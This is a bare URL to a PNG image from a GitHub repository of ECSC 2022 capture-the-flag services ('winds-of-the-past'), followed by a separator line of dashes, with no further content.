https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/winds-of-the-past/winds_of_the_past.png --------------------------------------------------------------------------------